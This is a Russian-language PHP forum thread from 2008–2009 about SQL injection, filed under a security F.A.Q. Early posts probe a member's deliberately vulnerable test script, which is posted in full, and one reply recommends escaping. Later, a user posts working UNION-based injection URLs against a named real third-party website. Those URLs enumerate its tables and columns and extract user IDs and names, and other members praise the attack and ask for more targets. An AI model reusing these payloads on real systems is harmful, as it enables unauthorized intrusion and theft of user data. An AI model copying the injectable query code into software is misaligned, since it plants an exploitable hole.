Значит не шаришь :) Дай-ка ссылку на свой скрипт.
+ еще у тебя наверняка включен магик_квотес
новые сообщения
ответы на мои сообщения
избранное
скрытые темы
случайный топик
открыть всё в новых вкладках
Форум → Программирование → Пыхнуть хотите? → F.A.Q. → Безопасность.Часть 1.SQL-иньекции
Безопасность.Часть 1.SQL-иньекции
Страницы: ← Предыдущая страница • Следующая страница →
-
Сообщения:
2701
Репутация:
N
Группа:
Кто попало
-
Сообщения:
5641
Репутация:
N
Группа:
Джедаи
21 июля 2008 г. 21:39, спустя 17 минут 7 секунд
You can be anything you want to be. Just turn yourself into anything you think that you could ever be. -
Сообщения:
22959
Репутация:
N
Группа:
в ухо
21 июля 2008 г. 22:15, спустя 36 минут 27 секунд
да и вообще ничего из данной статьи не прошло
Frozzeg, http://ssun.no-ip.org/some_sql_injection.php?id=1'+union+select+null,null,null/*
Теперь осталось перебрать имена таблиц (заместо null), выводились бы пользовательские данные, мне бы на ум пришло в первую очередь "passwd", "pass", "password", "pwd", "p"https://smappi.org/ - платформа по созданию API на все случаи жизни -
Сообщения:
22959
Репутация:
N
Группа:
в ухо
21 июля 2008 г. 22:24, спустя 8 минут 19 секунд
Наверняка у тебя там стоит свитч-кейс конструкция, так как при таком запросе "http://ssun.no-ip.org/some_sql_injection.php?id=1'+and+id+is+null/*" получаем "Гость!!! Лох ли ты? Xз", и это значение выдается по дефолту, так как мускуль не отдал ничего.
Да, ну еще установил что у тебя есть поле "id"…https://smappi.org/ - платформа по созданию API на все случаи жизни -
Сообщения:
22959
Репутация:
N
Группа:
в ухо
21 июля 2008 г. 22:32, спустя 8 минут 50 секунд
Frozzeg, только не включай мегик_квот, лучше заюзай mysql_real_escape_string или еще лучше goDB — библиотека для работы с MySQL из PHPhttps://smappi.org/ - платформа по созданию API на все случаи жизни
-
Сообщения:
5641
Репутация:
N
Группа:
Джедаи
22 июля 2008 г. 11:14, спустя 12 часов 41 минуту 15 секунд
я и не собирался, что до mysql_real_escape_string, то спасибо конечно, но с защитой я ознакомлен) меня интересует взлом
да и вообще ничего из данной статьи не прошло
Frozzeg, http://ssun.no-ip.org/some_sql_injection.php?id=1'+union+select+null,null,null/*
Теперь осталось перебрать имена таблиц (заместо null), выводились бы пользовательские данные, мне бы на ум пришло в первую очередь "passwd", "pass", "password", "pwd", "p"
вставил имена таблиц но появилась только ошибка
Да, ну еще установил что у тебя есть поле "id"…
как?)
а вот сам скрипт если интересно<?php
if(isset($_GET[id]))
{
$id=$_GET[id];
if(!empty($id))
{
@include_once 'mysql.inc.php';
mysql_select_db("sql_inj");
$query=mysql_query("select * from users where id='$id'");
if($query)
{
$values=mysql_fetch_array($query);
if(empty($values[username]) and empty($values[lox]))
{
$values[username]="Гость";
$values[lox]="Xз";
}
echo $values[username]."!!! Лох ли ты? ".$values[lox];
}
}
}
?>You can be anything you want to be. Just turn yourself into anything you think that you could ever be. -
Сообщения:
22959
Репутация:
N
Группа:
в ухо
22 июля 2008 г. 12:11, спустя 57 минут 43 секунды
вставил имена таблиц но появилась только ошибка
Frozzeg, ты не понимаешь как работает UNION. Выводи полностью весь результат полученный от$values=mysql_fetch_array($query);
то есть сделай var_dump($values) или forearch'ем выводи.как?)
Логикой и методом научного тыка.https://smappi.org/ - платформа по созданию API на все случаи жизни -
Сообщения:
1386
Репутация:
N
Группа:
Адекваты
3 августа 2009 г. 0:26, спустя 376 дней 12 часов 14 минут
кому мож интересно..
применение уязвимости к зарубежному сайту sonix.dk
тут узнаем все таблицы данной биде)
http://sonix.dk/index.php?page=forum&id=-2'+union+select+1,2,3,4,5,table_NAME,7,8+from+INFORMATION_SCHEMA.tables+--+
тут узнаём все столбцы таблицы указанной после where+table_name='
http://sonix.dk/index.php?page=forum&id=-2'+union+select+1,2,3,4,5,COLUMN_NAME,7,8+from+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='openid_user'+--+
ну а тут собсно вместо вылезжих настранице цифр(подобраных нами полей) подставляем необходимые колонки
http://sonix.dk/index.php?page=forum&id=-1'+union+select+1,2,3,4,5,id,name,8+from+openid_user+--+
зы если надо стразу 2 столбца вместо 1й цифры пишем так:
http://sonix.dk/index.php?page=forum&id=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,id,name),7,8+from+openid_user+--+
щас цифра 7 свободна а внизу вместо 6ки идёт ид:нейм -
Сообщения:
26646
Репутация:
N
Группа:
в ухо
3 августа 2009 г. 0:25, спустя 23 часа 58 минут 34 секунды
Mr.Pihto, молорик :)Спустя 15 сек.добавил в фавориты :)Сапожник без сапог -
Сообщения:
1386
Репутация:
N
Группа:
Адекваты
3 августа 2009 г. 0:27, спустя 2 минуты 25 секунд
phpdude, рад что понравилось)Спустя 32 сек.мне и самому понравилось)
-
Сообщения:
1386
Репутация:
N
Группа:
Адекваты
3 августа 2009 г. 18:08, спустя 17 часов 40 минут 33 секунды
phpdude, но везде свои приколы.. такчто если неполучица данным способом то это незначит что там ниче не сдеалть.. сюда кинеш поковыряем)
-
Сообщения:
1048
Репутация:
N
Группа:
Адекваты
-
Сообщения:
7958
Репутация:
N
Группа:
в ухо
7 августа 2009 г. 23:52, спустя 14 минут 48 секунд
о_О когда и в чьем обличии??? Я опять что-то пропустил???
-
Сообщения:
22959
Репутация:
N
Группа:
в ухо
7 августа 2009 г. 23:53, спустя 1 минуту 41 секунду
да, он был тут месяц-два назад… в разделе Java посмотри
о_О когда и в чьем обличии??? Я опять что-то пропустил???https://smappi.org/ - платформа по созданию API на все случаи жизни -
Сообщения:
5641
Репутация:
N
Группа:
Джедаи
7 августа 2009 г. 23:55, спустя 1 минуту 7 секунд
йомана, этож атец флуда на пыхе…
да, он был тут месяц-два назад… в разделе Java посмотри
о_О когда и в чьем обличии??? Я опять что-то пропустил???You can be anything you want to be. Just turn yourself into anything you think that you could ever be.
Страницы: ← Предыдущая страница • Следующая страница →
Пожалуйста, авторизуйтесь, чтобы написать комментарий!